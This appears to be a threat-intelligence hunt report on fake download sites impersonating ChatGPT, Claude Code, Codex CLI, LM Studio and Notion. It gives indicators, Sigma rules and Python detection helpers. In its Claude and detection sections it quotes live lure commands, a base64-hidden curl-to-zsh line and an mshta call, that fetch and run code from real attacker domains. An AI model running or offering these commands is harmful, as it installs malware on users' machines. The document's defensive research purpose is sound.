Software Impersonation Infrastructure
Detection Chokepoint Framework
Every masquerading delivery campaign follows the same chain. The brand changes. The lure page changes. The payload host rotates. But the prerequisites don't: the adversary must register infrastructure, build a convincing lure, stage a payload, and get the victim to execute something. Perfect visual impersonation neutralizes user-facing trust signals - your detection budget belongs at execution and infrastructure layers.
Infrastructure Patterns Across Hunts
Active Campaigns (Hunt Intelligence)
Validated hunts from the de-intel-pipeline. Each object passed schema, citation, and source-diversity validation before promotion to hunts/.
ChatGPT-Impersonation-MROScanner-Installer - Phishing / lure page, EXE download, CDN staging, Code signing abuse, Favicon pivot
chatgpt-windows.com · app-update-chatgpt.com
Claude-Code-Impersonation-ClickFix-Install-Modal - Phishing / lure page, mshta HTA, curl | shell, Obfuscation, Favicon pivot
uneifoifow-3ndfskq.pages.dev · too.clawddddd.com · fine-byte2.com · download.version-516.com
LM-Studio-Domain-Squatting-API-Endpoint-Impersonation - Brand masquerade, Phishing / lure page
lmstudio.co.com · www.api.lmstudio.co.com
Notion-Masquerade-Delivery-Survey - Survey / squat only
notiondownload.com
OpenAI-Codex-CLI-Domain-Squatting-Credential-Harvest - Brand masquerade, Phishing / lure page
codex-cli.org · codexhub.click · codexcli.homes · codexcli.gr.com
Brand Impersonation Matrix
| Brand | Campaigns | Delivery methods | Confirmed delivery |
|---|---|---|---|
| ChatGPT / OpenAI | 1 | CDN staging; Code signing abuse; EXE download; Favicon pivot; Phishing / lure page | Yes |
| Claude / Anthropic | 1 | Favicon pivot; Obfuscation; Phishing / lure page; curl \| shell; mshta HTA | Yes |
| LM Studio | 1 | Brand masquerade; Phishing / lure page | No |
| Notion | 1 | Survey / squat only | No |
| OpenAI Codex CLI | 1 | Brand masquerade; Phishing / lure page | No |
ChatGPT Impersonation - MROScanner OU Installer
A fake "ChatGPT for Windows" download page (chatgpt-windows.com) on Oracle Cloud serves a 2.3 MB Inno Setup installer signed by Estonian shell company MROScanner OU. Download is JS-gated - no static link in HTML - with Windows-only UA fingerprinting and per-visitor affiliate tracking via a PHP backend. Payload staged on BunnyCDN.
```text
POST /init/tracking.php
→ returns per-visitor URL: https://app-cg.b-cdn.net/ChatGPT_Installer.exe?hash=<token>

ChatGPT_Installer.exe
SHA-256: 17dc646d645252196a19e87752fa21dbe7b626cd71a9dacddebd9a2ed8f1e16e
Signer: MROScanner OU (SSL.com, thumbprint E3B6CF11...)
```
E3B6CF11... appears on every binary this operator signs until revocation (valid until April 2027). The domain rotates. The CDN bucket name rotates. The cert thumbprint does not. Monitor VT/Hunt.io for new hits on this signer.
/init/tracking.php. Non-Windows user-agents get "Unsupported System" - further reducing scanner noise and narrowing the victim pool to paid malvertising traffic (UTM params: fbclid, bid, tid).
| Signal | Durability | Notes |
|---|---|---|
| chatgpt-windows.com | Medium | 3-year squatter history; repurposed May 2026 |
| app-cg.b-cdn.net | Low | CDN bucket - hash the binary when sandbox completes |
| MROScanner OU cert | High | Pivot on thumbprint across VT/Hunt.io |
| /init/tracking.php | Medium | Same PHP structure links sibling campaigns |
Claude Code - ClickFix Install Modal
Three fake "Download Claude" pages clone claude.com and present a fake install modal. Mac victims run a base64-concealed curl | zsh command; Windows victims run mshta https://download.version-516.com/claude. The kit predates Claude targeting - /other path was active 12 days before /claude.
```text
# Mac - social cover echo, then malicious curl
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh
# Windows - HTA via signed LOLBin
mshta https://download.version-516.com/claude
```
xprssit.com vs ewabeniak.com).
claude-custom-tracking.js from www.anthropic.com. Victim traffic blends into legitimate claude.com analytics noise - a subtle signal worth monitoring if you correlate page views with actual installs.
| Domain | Role |
|---|---|
| uneifoifow-3ndfskq.pages.dev | Cloudflare Pages lure; Mac payload via xprssit.com |
| too.clawddddd.com | Typosquat lure; Mac payload via ewabeniak.com |
| download.version-516.com | Shared Windows HTA host (/claude, /other) |
| xprssit.com / ewabeniak.com | Per-site Mac shell script delivery (/curl/<hash>) |
OpenAI Codex CLI - Domain Squatting
Multiple domains registered within weeks of the Codex CLI public launch (April 2026) squat the exact product name. No confirmed binary delivery - credential harvest and SEO poisoning targeting developers who search for install instructions instead of using npm install -g @openai/codex.
| Domain | Status | Pattern |
|---|---|---|
| codex-cli.org | Phishing-tagged; dormant empty HTML | Squats npm package name |
| codexhub.click | Vietnamese Codex CLI page + /login | Credential harvest suspected |
| codexcli.homes | SSL cipher mismatch - conditional serving | Geo/IP gated content |
| codexcli.gr.com | 404 at scan time | Dormant squat infrastructure |
LM Studio - API Endpoint Impersonation
lmstudio.co.com redirects to www.api.lmstudio.co.com, impersonating the LM Studio local API server (normally localhost:1234). No installer delivery - threat is prompt exfiltration or API key theft via a misconfigured client endpoint string.
api.lmstudio.co.com is indistinguishable from a legitimate remote LM Studio endpoint in a config string. Watch for this pattern on Ollama (localhost:11434), Jan.ai, AnythingLLM. DNS was pulled by May 11, 2026 after community phishing reports.
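A config audit for the endpoint-string risk described above, added here as an example and not part of the hunt report. It classifies each configured API base URL as loopback, off-box lookalike (a local-server brand string such as lmstudio or ollama on a host that is not loopback), or plain remote. The config dict and the llm-gateway.corp.example host are constructed; the lookalike entry is the page's own www.api.lmstudio.co.com.

```python
"""Audit configured local-model API endpoints for off-box lookalikes.

Added example (not from the hunt report): the config dict is constructed, and
the classification rules are this example's own reading of the page's advice.
"""
import ipaddress
from urllib.parse import urlparse

# Brand strings of local inference servers and their default loopback ports,
# as named on the page (LM Studio 1234, Ollama 11434).
LOCAL_SERVER_BRANDS = {"lmstudio": 1234, "ollama": 11434}
LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}


def _is_loopback(host: str) -> bool:
    """True for 127.0.0.0/8, ::1 or a literal localhost name."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host in LOOPBACK_NAMES


def classify_endpoint(base_url: str) -> tuple:
    """Return (verdict, reason); verdict is local, lookalike, remote or invalid."""
    u = urlparse(base_url)
    host = (u.hostname or "").lower()
    if u.scheme not in ("http", "https") or not host:
        return ("invalid", f"not an http(s) URL: {base_url!r}")
    if _is_loopback(host):
        return ("local", f"{host}:{u.port or '(default)'} is loopback")
    # A brand string in the hostname of a non-loopback endpoint is the
    # lmstudio.co.com pattern: looks like the local API server, is not.
    squashed = host.replace("-", "").replace("_", "")
    for brand, port in LOCAL_SERVER_BRANDS.items():
        if brand in squashed:
            return ("lookalike",
                    f"{host} carries '{brand}' but is not loopback "
                    f"(a real {brand} server normally listens on 127.0.0.1:{port})")
    return ("remote", f"{host} is off-box; confirm it is an approved gateway")


def audit_config(config: dict) -> dict:
    """Classify every URL-valued setting; returns {setting: (verdict, reason)}."""
    return {key: classify_endpoint(value) for key, value in config.items()
            if isinstance(value, str) and "://" in value}


# Constructed sample config: two loopback defaults, the lookalike from the
# page, and a hypothetical corporate gateway.
SAMPLE_CONFIG = {
    "lmstudio_base_url": "http://localhost:1234/v1",
    "ollama_host": "http://127.0.0.1:11434",
    "openai_compatible_base_url": "https://www.api.lmstudio.co.com/v1",
    "corp_gateway": "https://llm-gateway.corp.example/v1",
    "temperature": 0.2,
}

if __name__ == "__main__":
    for key, (verdict, reason) in audit_config(SAMPLE_CONFIG).items():
        print(f"{verdict:9} {key}: {reason}")
```

The same check applies to any OpenAI-compatible client setting: the brand string is the lure, the non-loopback host is the tell.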
Notion Coverage Survey
Favicon pivot for Notion returned 5,692 non-Notion hits - structurally too noisy because Notion is used as a CMS backend by thousands of legitimate sites. No active Windows/Mac delivery campaign detected in the last 90 days. Only finding: notiondownload.com (Android APK squatter, Hostinger).
filename:*.exe) requires a URLScan API key. Title pivots and domain-pattern queries are the fallback when favicon hash pivots produce unusable noise.
Cross-Campaign Operator Comparison
Two distinct delivery philosophies emerged from the May 2026 hunt window - traditional EXE distribution vs. paste-to-run developer targeting.
| Dimension | MROScanner OU (ChatGPT) | ClickFix Install Modal (Claude) |
|---|---|---|
| Delivery | EXE download (JS-gated) | Paste-to-run command |
| File on disk | Yes - Inno Setup installer | No file for primary vector |
| Code signing | Shell-company Authenticode | Not applicable |
| OS targeting | Windows only (UA filter) | Mac + Windows (separate commands) |
| Obfuscation | BunnyCDN + per-visitor hash | Base64 URL in JS + domain rotation |
| Infrastructure | Oracle Cloud dedicated VM | Cloudflare Pages (ephemeral) |
| Traffic model | Paid malvertising (UTM tracking) | Real brand analytics loaded |
| Kit reuse | Unknown | Confirmed multi-brand (/other path) |
| Sophistication | Medium | Medium-high |
MITRE Technique Frequency (Hunts)
| Technique | Label | Hunts |
|---|---|---|
| T1566.002 | Phishing / lure page | 4 |
| T1036.005 | Brand masquerade | 2 |
| T1204.002 | EXE download | 1 |
| T1102 | CDN staging | 1 |
| T1553.002 | Code signing abuse | 1 |
| T1218.005 | mshta HTA | 1 |
| T1059.004 | curl \| shell | 1 |
| T1027 | Obfuscation | 1 |
Aggregate Pipeline Data
IOC-first pipeline records from confirmed payload reports and infrastructure hunts. Delivery chains shown only when URLScan captured the redirect sequence.
Payload Class Breakdown
Confirmed Delivery Domains (sample)
| Domain | IP | Class | First seen |
|---|---|---|---|
| salesteamrealtors.com | - | unknown | 2026-03-22 |
| www.thesalesteam.ca | - | unknown | 2026-03-22 |
| steamunlock.site | - | unknown | 2026-03-22 |
| uszoomwebhost.live | - | unknown | 2026-03-22 |
| wildcard.steam-machine.com | - | unknown | 2026-03-22 |
| tryclearsteam.com | - | unknown | 2026-03-22 |
| wpdevsteam.com | - | unknown | 2026-03-22 |
| www1.blockchainchatgpt.com | - | unknown | 2026-03-22 |
| dlads.discordl.org | - | unknown | 2026-03-22 |
| support.zoom.us.id.xstore1.cloud | - | unknown | 2026-03-22 |
| dev.eu.as.eu.discord.tattoo | - | unknown | 2026-03-22 |
| alcalc.discordian.ca | - | unknown | 2026-03-22 |
| www.app.steamlevelu.com | - | unknown | 2026-03-22 |
| steamboatweddingday.com | - | unknown | 2026-03-22 |
| staging.wwwapp.admin.discord.tattoo | - | unknown | 2026-03-22 |
Favicon Clusters
| Hash | Domains | Sample |
|---|---|---|
| | 100 | |
| | 5 | |
| | 1 | |
| | 1 | |
Weekly Volume
Detection Recommendations
Each recommendation maps to the ATT&CK technique it detects. Execution-layer rules survive brand rotation; domain blocklists do not.
Example detection logic
```yaml
title: Masqueraded Installer OriginalFilename Mismatch
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\ChatGPT_Installer.exe'
      - '\ZoomInstaller.exe'
      - '\DiscordSetup.exe'
    CurrentDirectory|contains:
      - '\Downloads\'
      - '\AppData\Local\Temp\'
  filter_legit:
    OriginalFileName|contains:
      - 'ChatGPT'
      - 'Zoom'
      - 'Discord'
  condition: selection and not filter_legit
level: high
```
Observed signers (1)
ChatGPT_Installer.exe
Signer: MROScanner OU (Tallinn, EE)
CA: SSL.com Code Signing Intermediate CA RSA R1
Thumbprint: E3B6CF111525417CE68C1CBE99E257DBAC54D071
Valid: 2026-04-22 to 2027-04-21
Example detection logic
```yaml
title: Signed Installer Executed From Downloads After Browser Spawn
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  selection_installer:
    Image|endswith:
      - '\setup.exe'
      - '\installer.exe'
      - '\install.exe'
    CurrentDirectory|contains: '\Downloads\'
    # Signed / SignatureStatus / Signature are not fields of Sysmon Event ID 1
    # (they exist only on Event ID 7 ImageLoad); this rule needs an EDR
    # process_creation source that enriches events with signer metadata.
    Signed: 'true'
  filter_known_vendors:
    SignatureStatus: 'Valid'
    Signature|contains:
      - 'Microsoft'
      - 'Google'
      - 'Zoom'
  condition: selection_parent and selection_installer and not filter_known_vendors
level: high
```
mshta.exe spawned from cmd.exe, Run dialog, or terminal context fetching an HTA from an external domain. Covers Claude Code ClickFix Windows delivery via download.version-516.com/claude.
Observed payloads (1)
```text
mshta https://download.version-516.com/claude
```
Example detection logic
```yaml
title: Mshta Executing Remote HTA From Unusual Parent
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\mshta.exe'
    CommandLine|contains:
      - 'http://'
      - 'https://'
  selection_parent:
    ParentImage|endswith:
      - '\cmd.exe'
      - '\explorer.exe'
      - '\WindowsTerminal.exe'
  filter_enterprise:
    CommandLine|contains:
      - '.microsoft.com'
      - '.windows.com'
  condition: selection and selection_parent and not filter_enterprise
level: high
```
curl -s ... | zsh or curl ... | bash where the URL domain is not a known package manager or vendor CDN. Claude Code install modal uses base64-concealed curl URLs on attacker-controlled domains.
Observed payloads (2)
```text
# Social cover echo + malicious curl (Mac)
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh
# Decoded payload URL (uneifoifow variant)
https://xprssit.com/curl/6df71b43667a2d1d9de3e88cba7e16fb11b4ddf67af64b853b903b3fa8ead500
```
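The base64 wrapper keeps the payload domain out of any plain command-line string match, so a rule that keys only on the visible text sees claude.ai and nothing else. This added example (not from the report) decodes the echo '<base64>' | openssl base64 -d construct back to its URL and checks every URL, hidden and visible, against the vendor list the detection rule below uses (claude.ai is added to that list here as an assumption). The lure command line is reconstructed by re-encoding the decoded payload URL the report lists; the other two sample command lines are constructed.

```python
"""Surface URLs hidden in base64-wrapped curl | shell one-liners.

Added example, not part of the hunt report. SAMPLE_LURE is rebuilt here by
re-encoding the decoded payload URL from the report; the real lure ships the
base64 text already, so only that encoding step is synthetic.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

# Domains the page's Sigma rule allowlists, plus claude.ai (assumption).
VENDOR_DOMAINS = ("anthropic.com", "claude.ai", "homebrew.sh", "github.com")

# echo '<base64>' | openssl base64 -d   (with or without -A)
B64_ECHO = re.compile(r"echo\s+'([A-Za-z0-9+/=]+)'\s*\|\s*openssl\s+base64\s+-d")
VISIBLE_URL = re.compile(r"https?://[^\s'\"|)]+")


def hidden_urls(command_line: str) -> list:
    """Decode every echo '<b64>' | openssl base64 -d construct to its URL(s)."""
    found = []
    for m in B64_ECHO.finditer(command_line):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64: leave it for a human
        found.extend(VISIBLE_URL.findall(text) or [text.strip()])
    return found


def is_vendor(url: str) -> bool:
    """Exact or subdomain match against the allowlist; substring matches are not enough."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in VENDOR_DOMAINS)


def assess(command_line: str) -> dict:
    """Classify a curl-to-shell command line.

    suspicious  : a decoded (hidden) URL points off the vendor list
    review      : only a visible URL points off the vendor list
    allowlisted : every URL, visible or hidden, is a vendor domain
    """
    visible = VISIBLE_URL.findall(command_line)
    hidden = hidden_urls(command_line)
    if any(not is_vendor(u) for u in hidden):
        verdict = "suspicious"
    elif any(not is_vendor(u) for u in visible):
        verdict = "review"
    else:
        verdict = "allowlisted"
    return {"verdict": verdict, "visible": visible, "hidden": hidden}


# Decoded payload URL from the report; the lure line is rebuilt around it.
PAYLOAD_URL = ("https://xprssit.com/curl/"
               "6df71b43667a2d1d9de3e88cba7e16fb11b4ddf67af64b853b903b3fa8ead500")
SAMPLE_LURE = (
    'echo "Downloading Claude: https://claude.ai/install.sh" && '
    f"curl -s $(echo '{base64.b64encode(PAYLOAD_URL.encode()).decode()}' "
    "| openssl base64 -d -A) | zsh"
)
# Constructed benign and borderline lines for comparison.
SAMPLE_VENDOR = "curl -fsSL https://github.com/example-org/tool/releases/download/v1/install.sh | sh"
SAMPLE_RAW = "curl -fsSL https://raw.githubusercontent.com/example-org/tool/main/install.sh | bash"

if __name__ == "__main__":
    for line in (SAMPLE_LURE, SAMPLE_VENDOR, SAMPLE_RAW):
        r = assess(line)
        print(r["verdict"], "visible:", r["visible"], "hidden:", r["hidden"])
```

Note that raw.githubusercontent.com is not a subdomain of github.com, so it lands in review rather than allowlisted; whether to add it is a tuning decision for the environment.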
Example detection logic
```yaml
title: Curl Piped to Shell From Non-Vendor Domain
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    # The '|' only appears in the invoking shell's own argv (zsh -c "curl ... | zsh"),
    # never in curl's; keep the shell images in this list or the rule goes blind.
    Image|endswith:
      - '/curl'
      - '/zsh'
      - '/bash'
    CommandLine|contains|all:
      - 'curl'
      - '|'
  filter_vendors:
    CommandLine|contains:
      - 'anthropic.com'
      - 'homebrew.sh'
      - 'github.com'
  condition: selection and not filter_vendors
level: high
```
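To see how the three process-creation rules above behave on real events, here is an added example (not from the report) that transcribes their selections into a small Sigma-subset evaluator and runs constructed events through it. It supports only endswith, contains and contains|all with case-insensitive matching, which is all these rules use. The events are constructed; the paths and URLs reuse values from the page, except example.microsoft.com, which is a placeholder for the enterprise filter.

```python
"""Run the three process-creation rules above over constructed events.

Added example, not part of the report: selections are transcribed from the
page's Sigma rules, the evaluator is a small Sigma subset (endswith, contains,
contains|all; case-insensitive; AND/NOT conditions), and events are constructed.
"""


def field_matches(value, op, patterns):
    """One Sigma-style field test; a missing field never matches."""
    if value is None:
        return False
    v = str(value).lower()
    pats = [p.lower() for p in patterns]
    if op == "endswith":
        return any(v.endswith(p) for p in pats)
    if op == "contains":
        return any(p in v for p in pats)
    if op == "contains|all":
        return all(p in v for p in pats)
    raise ValueError(f"unsupported modifier: {op}")


def block_matches(event, block):
    """A selection or filter block holds when every field test in it holds."""
    return all(field_matches(event.get(f), op, pats) for (f, op), pats in block.items())


RULES = {
    "Masqueraded Installer OriginalFilename Mismatch": {
        "selection": {
            ("Image", "endswith"): ["\\ChatGPT_Installer.exe", "\\ZoomInstaller.exe",
                                    "\\DiscordSetup.exe"],
            ("CurrentDirectory", "contains"): ["\\Downloads\\", "\\AppData\\Local\\Temp\\"],
        },
        "filter_legit": {("OriginalFileName", "contains"): ["ChatGPT", "Zoom", "Discord"]},
        "condition": lambda m: m["selection"] and not m["filter_legit"],
    },
    "Mshta Executing Remote HTA From Unusual Parent": {
        "selection": {
            ("Image", "endswith"): ["\\mshta.exe"],
            ("CommandLine", "contains"): ["http://", "https://"],
        },
        "selection_parent": {
            ("ParentImage", "endswith"): ["\\cmd.exe", "\\explorer.exe", "\\WindowsTerminal.exe"],
        },
        "filter_enterprise": {("CommandLine", "contains"): [".microsoft.com", ".windows.com"]},
        "condition": lambda m: m["selection"] and m["selection_parent"]
                               and not m["filter_enterprise"],
    },
    "Curl Piped to Shell From Non-Vendor Domain": {
        "selection": {
            ("Image", "endswith"): ["/curl", "/zsh", "/bash"],
            ("CommandLine", "contains|all"): ["curl", "|"],
        },
        "filter_vendors": {("CommandLine", "contains"): ["anthropic.com", "homebrew.sh", "github.com"]},
        "condition": lambda m: m["selection"] and not m["filter_vendors"],
    },
}

# Constructed process_creation events; paths and URLs reuse page values.
SAMPLE_EVENTS = [
    {"Image": "C:\\Users\\v\\Downloads\\ChatGPT_Installer.exe",  # 0: fires (no brand in PE metadata)
     "CurrentDirectory": "C:\\Users\\v\\Downloads\\", "OriginalFileName": "setup.exe"},
    {"Image": "C:\\Users\\v\\Downloads\\ChatGPT_Installer.exe",  # 1: filtered by filter_legit
     "CurrentDirectory": "C:\\Users\\v\\Downloads\\", "OriginalFileName": "ChatGPT_Installer.exe"},
    {"Image": "C:\\Windows\\System32\\mshta.exe",                # 2: fires
     "CommandLine": "mshta https://download.version-516.com/claude",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Image": "C:\\Windows\\System32\\mshta.exe",                # 3: filtered (placeholder vendor URL)
     "CommandLine": "mshta https://example.microsoft.com/app.hta",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "/bin/zsh",                                        # 4: fires
     "CommandLine": "zsh -c \"curl -s https://xprssit.com/curl/6df71b43667a2d1d9de3e88cba7e16fb11b4ddf67af64b853b903b3fa8ead500 | zsh\""},
    {"Image": "/bin/bash",                                       # 5: fires; 'github.com' does not cover this host
     "CommandLine": "bash -c \"curl -fsSL https://raw.githubusercontent.com/org/tool/main/install.sh | bash\""},
]


def evaluate(event):
    """Return the names of every rule whose condition holds for the event."""
    hits = []
    for name, rule in RULES.items():
        blocks = {k: block_matches(event, v) for k, v in rule.items() if k != "condition"}
        if rule["condition"](blocks):
            hits.append(name)
    return hits


def run_samples():
    return [evaluate(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for i, hits in enumerate(run_samples()):
        print(i, hits or "-")
```

Event 5 is the tuning point: the filter string github.com is a substring test, and raw.githubusercontent.com does not contain it, so a Homebrew-style install from that host still fires the curl rule until the filter is extended.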
Example hunt queries
```text
# URLScan favicon pivot (ChatGPT)
hash:9747c13cd87b36ebf2ab567b9d0bc2ff49b5a4f46f4f51e4d053024f579fb9a0 AND NOT page.domain:openai.com
# URLScan favicon pivot (Claude)
hash:816a55828befeb50fe8a9556cb92d80194efefbd3f4e04ccf694992dd8e085e3 AND NOT page.domain:claude.ai
# Shodan
http.favicon.hash:<mmh3_int>
```
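The two pivot keys above are computed differently, which matters when you build queries from an icon you downloaded yourself. This added example (not from the report) derives both from raw favicon bytes: URLScan's hash: is the SHA-256 of the file, while Shodan's http.favicon.hash is MurmurHash3 (x86, 32-bit, signed) over the base64 text of the file in the form Python's base64/codecs modules emit it (76-character lines, each newline-terminated). The favicon bytes are a constructed placeholder, not a real icon, so the values they produce are not the ones quoted on the page; the MurmurHash3 routine is implemented inline so nothing outside the standard library is needed.

```python
"""Compute the two favicon pivot keys used in the hunt queries above.

Added example, not part of the report. SAMPLE_FAVICON is a constructed
placeholder rather than a real icon; the hashes it yields are illustrative.
"""
import base64
import hashlib
import struct

MASK32 = 0xFFFFFFFF


def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3_x86_32, returned as the signed 32-bit value mmh3.hash gives."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    h1 = seed & MASK32
    nblocks = len(data) // 4
    for i in range(nblocks):                       # 4-byte little-endian blocks
        k1 = struct.unpack_from("<I", data, i * 4)[0]
        k1 = (k1 * c1) & MASK32
        k1 = ((k1 << 15) | (k1 >> 17)) & MASK32
        k1 = (k1 * c2) & MASK32
        h1 ^= k1
        h1 = ((h1 << 13) | (h1 >> 19)) & MASK32
        h1 = (h1 * 5 + 0xE6546B64) & MASK32
    tail = data[nblocks * 4:]                      # 0..3 trailing bytes
    k1 = 0
    if len(tail) >= 3:
        k1 ^= tail[2] << 16
    if len(tail) >= 2:
        k1 ^= tail[1] << 8
    if len(tail) >= 1:
        k1 ^= tail[0]
        k1 = (k1 * c1) & MASK32
        k1 = ((k1 << 15) | (k1 >> 17)) & MASK32
        k1 = (k1 * c2) & MASK32
        h1 ^= k1
    h1 ^= len(data)
    h1 ^= h1 >> 16                                 # finalisation mix
    h1 = (h1 * 0x85EBCA6B) & MASK32
    h1 ^= h1 >> 13
    h1 = (h1 * 0xC2B2AE35) & MASK32
    h1 ^= h1 >> 16
    return h1 - (1 << 32) if h1 & 0x80000000 else h1


def urlscan_favicon_hash(favicon: bytes) -> str:
    """URLScan indexes the SHA-256 of the favicon resource."""
    return hashlib.sha256(favicon).hexdigest()


def shodan_favicon_hash(favicon: bytes) -> int:
    """Shodan hashes the base64 text (76-char lines, trailing newline) with mmh3."""
    b64 = base64.encodebytes(favicon)              # same output as codecs.encode(data, "base64")
    return murmur3_32(b64)


def pivot_queries(favicon: bytes, brand_domain: str) -> dict:
    """Build the URLScan brand-exclusion pivot and the Shodan query for one icon."""
    return {
        "urlscan": f"hash:{urlscan_favicon_hash(favicon)} AND NOT page.domain:{brand_domain}",
        "shodan": f"http.favicon.hash:{shodan_favicon_hash(favicon)}",
    }


# Constructed placeholder bytes standing in for a downloaded favicon.ico.
SAMPLE_FAVICON = b"\x00\x00\x01\x00\x01\x00\x10\x10" + bytes(range(256)) * 2

if __name__ == "__main__":
    for engine, query in pivot_queries(SAMPLE_FAVICON, "openai.com").items():
        print(f"{engine:8} {query}")
```

Feed the Shodan query the signed integer as printed; Shodan does not accept the unsigned form, which is the usual reason a hand-computed pivot returns nothing.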
/init/tracking.php + /init/pixel.php endpoint pattern with UTM parameters (fbclid, bid, tid) indicates a paid traffic malvertising campaign. If this PHP structure reappears on another fake download page, it connects campaigns to the same kit or operator.
Example detection logic
```text
# Proxy / DNS - hunt for sibling sites
cs-uri-stem: '/init/tracking.php'
cs-method: 'POST'
cs-uri-query|contains:
  - 'utm_source='
  - 'fbclid='
# URLScan pivot
page.url:"/init/tracking.php" AND filename:*.exe
```
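The proxy hunt above, and the tracking.php gate described in the ChatGPT campaign section, in runnable form as an added example (not part of the report). It parses constructed W3C-style proxy lines (client-ip, method, uri-stem, uri-query, host), keeps requests to the kit endpoints that carry at least one of the malvertising parameters the page names, and groups the hits by host so a new domain reusing the same PHP structure surfaces next to chatgpt-windows.com. All hosts other than chatgpt-windows.com, and every log line, are constructed.

```python
"""Hunt proxy logs for the /init/tracking.php + UTM kit fingerprint.

Added example, not part of the report. Log lines are constructed in a
five-field W3C-style layout (client-ip method uri-stem uri-query host); the
endpoint paths and parameter names come from the ChatGPT campaign write-up.
"""
from collections import defaultdict
from urllib.parse import parse_qs

KIT_ENDPOINTS = ("/init/tracking.php", "/init/pixel.php")
MALVERTISING_PARAMS = {"fbclid", "bid", "tid", "utm_source"}

# Constructed sample lines; '-' marks an empty query string.
SAMPLE_LOG = """\
10.0.0.5 POST /init/tracking.php utm_source=fb&fbclid=AbC123&bid=77 chatgpt-windows.com
10.0.0.6 GET /index.html - chatgpt-windows.com
10.0.0.7 POST /init/tracking.php tid=9&bid=12 lookalike-download.example
10.0.0.8 GET /init/pixel.php utm_source=google lookalike-download.example
10.0.0.9 POST /init/tracking.php - intranet-tool.example
10.0.0.9 POST /api/login user=x legit.example
"""


def parse_line(line: str):
    """Split one log line into a record; returns None for malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    client, method, stem, query, host = parts
    params = parse_qs(query) if query != "-" else {}
    return {"client": client, "method": method, "stem": stem, "host": host,
            "params": {k.lower() for k in params}}


def find_kit_hits(log_text: str, min_params: int = 1) -> list:
    """Requests to a kit endpoint carrying at least min_params malvertising params.

    min_params=1 keeps a bare /init/tracking.php on an unrelated site (line 5)
    out of the hit list; set it to 0 to hunt on the path alone.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["stem"] not in KIT_ENDPOINTS:
            continue
        matched = sorted(rec["params"] & MALVERTISING_PARAMS)
        if len(matched) >= min_params:
            rec["matched_params"] = matched
            hits.append(rec)
    return hits


def sibling_hosts(hits: list) -> dict:
    """Count hits per host so domains reusing the kit surface side by side."""
    by_host = defaultdict(int)
    for h in hits:
        by_host[h["host"]] += 1
    return dict(sorted(by_host.items()))


if __name__ == "__main__":
    hits = find_kit_hits(SAMPLE_LOG)
    for h in hits:
        print(h["host"], h["method"], h["stem"], h["matched_params"])
    print(sibling_hosts(hits))
```

The host grouping is the durable part: the domain rotates, the PHP structure and its parameter names are what tie a fresh lure site back to this operator.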